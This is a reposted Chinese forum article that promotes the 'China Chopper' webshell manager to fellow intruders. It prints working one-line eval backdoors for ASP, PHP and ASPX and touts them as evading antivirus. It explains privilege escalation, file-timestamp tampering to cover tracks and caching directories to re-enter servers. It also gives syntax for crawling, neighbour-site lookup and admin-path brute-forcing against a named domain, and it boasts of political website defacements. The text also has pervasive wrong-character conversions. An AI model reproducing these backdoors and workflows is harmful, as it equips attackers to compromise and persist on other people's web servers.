轉：中國菜刀用法

這篇文章是一個朋友寫的，可是他不讓說他是誰，就替他保密一下了。這篇文章看起來很像軟文，可是文章中介紹的還挺詳細，不要把他當成軟文來讀就好了。

做者：XXX

我是一個玩黑不少年的人，入侵了大大小小的服務器無數，體驗着入侵快感的同時，本身的技術和經驗也不斷提升，在滲透過程當中收集了大大小小的工具一堆，都快把本身的U盤放滿了，固然，隨着時代和技術的進步，不少工具也相應的過期了，可是卻不多去刪掉，看着那些熟悉的圖標，熟悉的界面，就好象看到了本身一步步成長的過程，這其中有不少是本身的做品，看着那些逐漸從醜陋過渡到簡陋再過渡到精美的軟件界面，呵呵，這其中的滋味，真的很感慨。

因爲腳本是我本身的弱項，因而這些年收集了不少腳本後門，好比早期的站長管理助手，海洋頂端系列，砍客一句話後門，蟲蟲催化劑後門，還有angel的phpspy等等系列，數不勝數，固然還有後期的一堆美化版，增強版，超級增強版。算起來，嬌娘asp後門美化版，是我所知的第一個流傳較廣的美化修改版，後來逐漸被更新的海洋頂端網替代了，漸漸淡出人們的視野，以上種種，asp,aspx,php,jsp,cfm,php,甚至wap協議通用的腳本後門，籮籮筐筐收集了一大堆，都快有10M大小了。這其中有一堆腳本是另外一堆腳本的子集，而不是交集，還有很多是有後門的，不過我也懶得去分辨和篩選了，畢竟這些東東能讓我用到的時候很少，經常使用的仍是那幾個腳本，好比ASP環境用這個，PHP環境用那個,JSP環境用那個，除非某些比較特別的功能，是這個經常使用的腳本後門裏面沒有的，我纔去找那些不經常使用的腳本後門來臨時代替一下，這些弄起來很煩，因此我一直在尋找着一款真正合心意的腳本後門，終於........，我發現了一個遠超我想象的腳本後門-------中國菜刀。

提及菜刀，就不得不提起菜刀的做者，做者是一個退伍軍人，生長在一個貧窮的農村，聽說初中也沒讀完，英語更是不咋地，但他卻自學掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand

等等，當初在六七年前臺灣鬧獨立的時候，他在國民黨和民進黨的網站上留下了「只有一箇中國」的黑頁，一鳴驚人。

做者是一個樸實，低調的技術牛人，他這些年留下的做品不少，中國菜刀是他最新的一個做品，從他以前的做品WEBSHELL管理器的基礎上修改而來，功能更加的強大。

你見過很強大的ASP後門，很強大的PHP後門，很強大的ASPX後門，那你見過很強大的asp,aspx,php三合一後門麼........，沒有吧，尤爲是這個後門，只有一句話。

Asp環境：<%eval request("a")%>

Php環境：<?php @eval($_POST['a']);?>

Aspx環境：<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是否是很震憾，很難以想象，是的，我剛接觸的時候，也是這樣的想法，就這三句話，一個名不見經傳的「中國菜刀」，就能夠代替我那蒐集了幾年，大大小小几百個多種平臺多種環境的腳本後門？，事實證實，我錯了，原來「中國菜刀」不只僅能夠代替那些後門，並且他的功能超出個人想象，就讓我慢慢說明吧。

1.就從最基本的講起，你的腳本是否是常常被殺，你怎麼變形都被殺，，傳到服務器被殺致使被管理員發現，結果你的權限就沒了，殺到你欲哭無淚。菜刀的一句話後門，能夠避免這個問題，只有短短的一行代碼，永遠不會被查殺。

2.你是否是很鬱悶你的後門傳到服務器上連他媽都不認識了，框架變形，字體變框框，點擊菜單無效，這個是由於系統語言不兼容形成的，菜刀是UINCODE方式編譯,支持多國語言輸入顯示,徹底不存在兼容性問題。

3.你是否是有不少webshell，你每次都拿記事本記下來，須要的時候，又去翻半天，弄得你很累很沒脾氣。有了「菜刀」，你能夠很方便管理你的webshell，全部的記錄都保存在加密的本地數據庫裏，並且支持webshell分類，讓你管理得層次分明。菜刀不只有臨時鎖定功能，方便你離開電腦的那小會時間不被別人偷你的webshell，也有加密功能，不輸對密碼，HOHO，偷了你的數據也沒用。

4.再來講說數據庫管理，這個是菜刀最最強大的功能，精通各平臺主流數據庫的做者，把這個功能寫的是淋漓盡致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等數據庫，支持不是最主要的，功能強大，人性化纔是最主要的，「菜刀」的數據庫操做界面，內置了經常使用的數據庫語句，很是直觀的表列名瀏覽功能，自動顯示錶名，列名，查詢語句，很是人性化的設計，更內置了很多自建的函數，方便不懂數據庫的菜鳥，都能查閱數據庫裏的數據，再說個「菜刀」數據庫管理的一個小技巧，對於access數據庫，能夠在菜刀的webshell操做界面，對着MDB文件點右鍵，點Access Management，就直接進入Access的數據庫操做界面了，方便吧，嘿嘿！！

5.再說說提權這塊，webshell的提權老是最讓人關心的，說到提權，就不能說到webshell上的cmd執行了，有些朋友並不瞭解菜刀的自定義CMD路徑功能，有兩種方法能夠設置指定的cmd路徑，一就是在cmd操做界面，輸入setp d:\cmd.exe，就能夠了，或者把cmd.exe上傳到目錄，而後點右鍵,點virtual terminal file，就能夠進入自定義CMD.EXE路徑的命令行了，一樣的，再給個cmd使用的小技巧，在菜刀的命令行裏，可使用cd等命令跳轉目錄，方便吧，嘿嘿！！嗯，另外，新版菜刀新增經常使用目錄管理功能，你能夠把你經常使用的目錄或者提權的目錄加進菜刀裏，這樣很方便你提權或者平常工做，是否是比那些固定了提權目錄的腳本後門要牛B的多啊，哈哈。

6.還有菜刀的webshell上的文件功能功能，也是很是人性化的，文件夾和文件的圖標徹底模枋windows,，文件日期，文件大小，文件權限，一目瞭然，尤爲是修改文件時間功能，很是的方便，直接對着要修改時間的文件點右鍵,modify the file time，而後在文件的時間那欄，輸入時間，回車，就修改完了。固然，菜刀的文件管理還有新建，刪除，上傳，下載，編輯功能，這些大同小異，就不一一細說了。不過有個功能，仍是要重點說明的，那就是目錄緩存功能，菜刀能夠把瀏覽過的webshell目錄都緩存在本地，這樣能夠方便下次訪問的時候更加快捷，最重要的是，當哪天你的權限丟了，起碼你還有對方服務器的文件目錄結構，方便再一次滲透。

說完你們都有的腳本後門功能，如今來講點特別的菜刀功能，很是特別跟實用的哦。菜刀的前身是WEBSHELL管理器，再結合了做者以前的web管理軟件等幾個工具的優勢，實在是大殺器的集合體。

1：蜘蛛爬行。我很喜歡用WVS，對於WEB安全這塊，功能是很是的強大，我很喜歡裏面的一個功能，目錄爬行，能夠把WEB站的文件目錄結構以很直觀的形式排列出來，很方便分析。我很是驚喜的發現，菜刀竟然也有這個功能，叫蜘蛛爬行。

用法:

{spider} {url:http://www.xunest.com/}

設定爬行範圍

{spider} {url:http://www.xunest.com/} {range:xunest.com}

跟WVS的功能徹底同樣，我上次上傳webshell圖片的時候，不知道腳本後門給傳到哪一個目錄，結果用菜刀的蜘蛛爬行功能找出來了，真是強大。

2：旁註查詢。在滲透的時候，旁註是很是關鍵的，不知有多少大站是死在他鄰居的進攻下啊。你見過查詢同服務器的全部域名，那你見過查詢同C段的全部域名不，呵呵，菜刀就能夠作到

用法:

查單一IP的綁定域名
{reverse_ip} {url:http://www.xunest.com/}
掃描本C段開放的WEB服務器，並查詢綁定域名
{reverse_ip_c} {url:http://www.xunest.com/}

3:字典爆破功能。你是否是很喜歡webtool的目錄掃描功能呢，既然菜刀是集大成之全部者，天然是不會少了這個功能的，並且功能更增強大。

用法：

{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.xunest.com/%s/} {flag:successfully} {dict:list.txt}

%s爲dict中的一行， flag:後面爲返回的數據(含HTTP頭部)中的特定關鍵字，加!!爲不包含關鍵字爲TRUE，不然包含關鍵字爲TRUE, list.txt爲當前目錄下的文件，可設爲絕對路徑，注意：不要包含太多的行。

這個目錄爆破功能，是很是靈活跟強大的，首先，能夠根據返回的數據包自定義來判斷目錄是否存在，而後能夠爆破已知目錄的上級目錄，舉個例子，假如你知道你的目錄是guanli，可是你是不知道guanli這個目錄是在哪一個目錄裏面，那麼你能夠

{crack} {url:http://www.xunest.com/%s/guanli/} {flag:HTTP/1.1 200} {dict:list.txt}

其實呢，菜刀仍是一個瀏覽器。。。。。，真的，不騙你，菜刀的瀏覽器功能，很是簡單，卻很是實用，能夠很方便的禁止或者開啓網站的腳本、控件執行，圖片顯示開關，最最方便的，仍是cookies編輯功能了，這個是很是重要的，誰用誰知道。菜刀的瀏覽器是能夠直接post提交的，這個功能有什麼用，相信黑黑們也不用我多說了吧。另一個，就是自定義JS,這個聽說也是很強大的，但我暫時還沒用到這個功能。

總結一下，菜刀一直在完善，一直在更新，發展到如今，已經不只僅是一個webshell管理器，能夠說是一個大殺器的集合體，就算徹底拋棄裏面的webshell管理功能，菜刀也是一個很不錯的瀏覽器，很不錯的後臺掃描工具，很不錯的cookies編輯提交工具，很不錯的文件管理工具，很不錯的旁註軟件，不單是方便各位黑客朋友使用，也很方便站長使用，畢竟裏面的文件管理功能，上傳下載，比FTP更加直觀了，最重要的，菜刀的數據庫管理功能，真的是前無古人，後無來者，很是很是方便，嚴重推薦你們使用。

另附做者的下一步開發計劃，菜刀即將支持JSP，CFM等等，更加靈活，也考慮開放菜刀的協議跟接口，這樣的話，你們能夠自由寫插件，也不侷限於eval這樣的一句話後門，另外，菜刀也將繼續保持以人爲本的人性化設計，會更加靈活，歡迎你們提意見。